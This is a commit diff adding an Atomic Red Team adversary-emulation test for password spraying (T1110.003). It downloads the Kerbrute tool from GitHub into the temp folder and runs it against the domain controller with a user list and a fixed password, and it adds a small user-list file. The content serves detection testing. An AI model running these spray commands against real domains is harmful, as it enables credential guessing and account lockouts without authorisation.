T1110.003 Kerbrute Password Spray (#2111)

* T1110.003 Kerbrute Password Spray

* Update T1110.003.yaml

Co-authored-by: Tom Hagan <thagan@nti.local>

atomics/T1110.003/T1110.003.yaml

@@ -253,3 +253,38 @@ atomic_tests:
     command: |
       import-module "$env:temp\MSOLSpray.ps1"
       Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
+- name: Password Spray using Kerbrute Tool
+  description: |  
+    Test a single password against a list of users
+  supported_platforms:
+  - windows
+  input_arguments:
+    domaincontroller:
+      description: Domain controller where test will be run
+      type: String
+      default: $ENV:userdnsdomain
+    domain:
+      description: Domain where you will be testing
+      type: String
+      default: $ENV:userdomain
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      kerbrute.exe must exist in $env:temp
+    prereq_command: |
+      if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+    get_prereq_command: |
+      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+  - description: |
+      passwordspray.txt must exist in $env:temp
+    prereq_command: |
+      if (test-path $env:temp\passwordspray.txt){exit 0} else {exit 1}
+    get_prereq_command: |
+      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "$env:temp\passwordspray.txt"
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      cd $env:temp
+      .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 
+      

atomics/T1110.003/src/passwordspray.txt

@@ -0,0 +1,7 @@
+test1
+test2
+test3
+test4
+test5
+passs_word
+drowssap